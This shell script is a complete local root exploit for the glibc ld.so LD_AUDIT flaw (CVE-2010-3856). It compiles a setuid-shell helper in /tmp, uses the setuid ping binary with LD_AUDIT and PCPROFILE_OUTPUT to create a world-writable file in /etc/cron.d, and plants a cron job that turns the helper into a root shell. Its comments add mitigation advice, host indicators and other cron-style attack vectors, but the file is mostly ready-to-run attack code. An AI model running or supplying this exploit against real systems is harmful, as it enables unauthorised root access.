#!/bin/sh
#
# $Id: raptor_ldaudit,v 1.2 2011/02/04 11:04:36 raptor Exp $
#
# raptor_ldaudit - privilege escalation through glibc ld.so
# Copyright (c) 2010 Marco Ivaldi <[email protected]>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x
# before 2.12.2, does not properly restrict use of the LD_AUDIT environment
# variable to reference dynamic shared objects (DSOs) as audit objects, which
# allows local users to gain privileges by leveraging an unsafe DSO located in
# a trusted library directory, as demonstrated by libpcprofile.so
# (CVE-2010-3856).
#
# Mitigation: run a glibc release at or after the versions named above, where
# ld.so restricts LD_AUDIT for set-user-ID programs. Mounting /tmp with
# "nosuid" independently defeats the last step of this script (executing a
# set-user-ID binary placed under /tmp).
#
# Host-based indicators this script leaves behind (see the code below):
#   /tmp/pwned.c, /tmp/pwned  - a root-owned set-user-ID binary under /tmp
#   /etc/cron.d/runme         - a world-writable cron entry created through a
#                               set-user-ID program (ping) started with LD_AUDIT
#                               and PCPROFILE_OUTPUT in its environment
# Auditing exec() of set-user-ID binaries whose environment carries LD_AUDIT
# (or other LD_* loader variables), and watching /etc/cron.d for new or
# world-writable files, both surface this technique.
#
# "Suit up. Score chicks. Be awesome." -- Barney Stinson
#
# This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben
# Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344
#
# Other possible attack vectors: /etc/cron.{hourly,daily,weekly,monthly}, at
# (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d and more...
#
# Usage:
# $ chmod +x raptor_ldaudit
# $ ./raptor_ldaudit
# [...]
# Everything looks fine. Just wait for it... LEGEN-DARY!
# -rwsr-xr-x 1 root users 5707 2010-11-11 14:48 /tmp/pwned
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root),100(users)
# sh-4.1#
# [don't forget to delete /tmp/pwned*!]
#
# Vulnerable platforms:
# Slackware 13.1 [tested, weird loop in dillon's cron but it works]
# openSUSE 11.3 [untested]
# Fedora Core 13 [untested]
# RHEL/CentOS 5 [untested]
# Ubuntu 10 [untested]
# [...]
#
echo "raptor_ldaudit - privilege escalation through glibc ld.so"
echo "Copyright (c) 2010 Marco Ivaldi <[email protected]>"
echo
# prepare setuid shell helper to circumvent bash checks
# Step 1: a tiny C helper that calls setuid(0)/setgid(0) and spawns /bin/sh.
# It is compiled as the unprivileged user and is harmless on its own; it only
# matters once the cron job below makes it root-owned and mode 4755.
# Artifacts: /tmp/pwned.c and /tmp/pwned.
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c
# gcc's status is checked by hand: the script does not use set -e anywhere.
if [ $? -ne 0 ]; then
echo "Error: Problems compiling setuid shell helper, check your gcc."
exit 1
fi
# do the magic!
# Step 2: the CVE-2010-3856 trigger itself. ping is set-user-ID root; a
# vulnerable ld.so honours LD_AUDIT and loads libpcprofile.so from a trusted
# library directory, and that DSO's initialisation opens the path named in
# PCPROFILE_OUTPUT while still running with root's privileges. "umask 0" is
# set first so the file root creates is world-writable and this unprivileged
# script can overwrite it in step 3. ping's own output is discarded.
runme="/etc/cron.d/runme"
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null
# Vulnerability check: on a patched ld.so the audit object is not honoured,
# so $runme is never created and reads back empty here.
if [ "`cat $runme 2>/dev/null`" = "" ]; then
echo "Error: Not vulnerable or wrong attack vector? See comments."
exit 1
fi
# build the cron script (vixie's crontab)
# Step 3: truncate the root-created file and replace its contents with a
# once-a-minute job that makes /tmp/pwned root-owned and set-user-ID, then
# deletes the cron file itself. Two lines are written because vixie cron
# expects a user field ("root") in /etc/cron.d entries and dillon's cron does
# not; whichever daemon is installed will parse the line meant for it.
echo -n > $runme
echo "* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme
# build the cron script (dillon's crontab)
echo "* * * * * chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme
# legen -- wait for it -- dary!
# Step 4: "* * * * *" fires once per minute, so a 70 second sleep covers one
# full scheduling interval. The ls line is the success indicator shown in the
# usage block above (-rwsr-xr-x, owner root); the final command runs the
# now set-user-ID helper.
echo -n "Everything looks fine. Just wait for it... "
sleep 70
echo "LEGEN-DARY!"
ls -l /tmp/pwned
/tmp/pwned